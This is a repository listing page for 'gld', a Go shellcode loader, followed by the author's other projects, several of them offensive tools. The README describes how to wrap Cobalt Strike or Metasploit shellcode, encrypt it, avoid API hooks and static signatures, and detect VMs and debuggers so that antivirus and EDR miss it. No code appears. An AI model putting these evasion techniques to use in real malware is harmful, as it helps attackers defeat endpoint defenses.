EddieIvan01/gld EddieIvan01/gld

  • This repository has been archived on 30/Jan/2021
  • Stars
    star
    170
  • Rank 223,357 (Top 5 %)
  • Language
    Go
  • License
    Mozilla Public Li...
  • Created over 4 years ago
  • Updated almost 4 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
EddieIvan01/gld
github

EddieIvan01

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Go shellcode LoaDer

Go shellcode LoaDer

This repo is a demo and lacks enough features to bypass AV/EDR. I have written a private framework with more evasion techs, it may be made public in the future

Usage

Generate shellcode via CS/MSF first, then use gld to compile wrapped-binary:

./gld shellcode.bin [x64/x86]

Tech

Loader

  • Shellcode is encrypted via AES-GCM, it will be decrypted and loaded in runtime
  • Use ntdll!ZwProtectVirtualMemory instead of kernelbase!VirtualProtect (bypass possible hooks) to bypass DEP
  • Use local variable instead of string literal to pass procedure name (string([]byte{...})), to avoid static memory matching

Detector

  • VM
    • Check if has a blacklist MAC prefixes
    • Check if physics memory < 2GB or number of CPU cores < 2 (cpuid and GlobalMemoryStatusEx)
  • DBG
    • Check if there is a debugger process (CreateToolhelp32Snapshot)
    • Check if current process is being debugged by a user-mode debugger (IsDebuggerPresent)

More Repositories

1

iox

Tool for port forwarding & intranet proxy
Go
998
star
2

win32api-practice

Offensive tools written for practice purposes
C++
148
star
3

pker

Automatically converts Python source code to Pickle opcode
Python
124
star
4

memexec

A library for loading and executing PE (Portable Executable) from memory without ever touching the disk
Rust
122
star
5

nic

🌀 Nic is a HTTP request client with elegant and easy-to-use API
Go
103
star
6

secure-cookie-faker

Security tool to encode/decode Golang web-frameworks' client-side session cookie which use `gorilla/securecookie` or `gorilla/sessions`, such as Gin, Echo or Iris
Go
36
star
7

lessons-robber

CUMT公选课多线程/协程抢课脚本
Python
21
star
8

analog-login

CUMT教务系统模拟登录
Python
14
star
9

ntlmssp

Windows NTLMSSP library
Go
11
star
10

zip_crack

zip压缩文件密码暴力破解
Python
9
star
11

macho-ld

In-memory loading and executing Mach-O files
Rust
6
star
12

ctf-hash-proof

fast cli tool written for CTFer to proof hash (md5, sha1, sha256, sha512)
Go
6
star
13

tar-vuln-server

复现利用tar指令checkpoint-action参数提权的http server程序
Go
4
star
14

nemesis

cli webshell manager
Python
3
star
15

win64-syscall

Windows x64 indirect syscall lib for maldev with no_std supporting
Rust
3
star
16

async-socks5

Rust
3
star
17

EddieIvan01.github.io

SCSS
3
star
18

flask-bbs

simple BBS demo, written in Flask and Bootstrap
JavaScript
2
star
19

roarCTF-dist-casino

roarCTF challenge dist source code and writeup
Python
2
star
20

Generate_Char_By_Xor

CTF中过滤指定字符的webshell,php中由字符异或生成新字符
Python
2
star
21

Dir_Scanner_WithProxies

using proxies to scan websites' dirs
Python
1
star
22

Game

vb小游戏——生死狙击
Visual Basic
1
star
23

x-csrf

middleware to defend CSRF attack for gin framework
Go
1
star
24

ProxyPool

a simple proxy pool written in Golang
Go
1
star
25

flag

1
star
26

functional-programming

some basic data structures written in Scheme
Scheme
1
star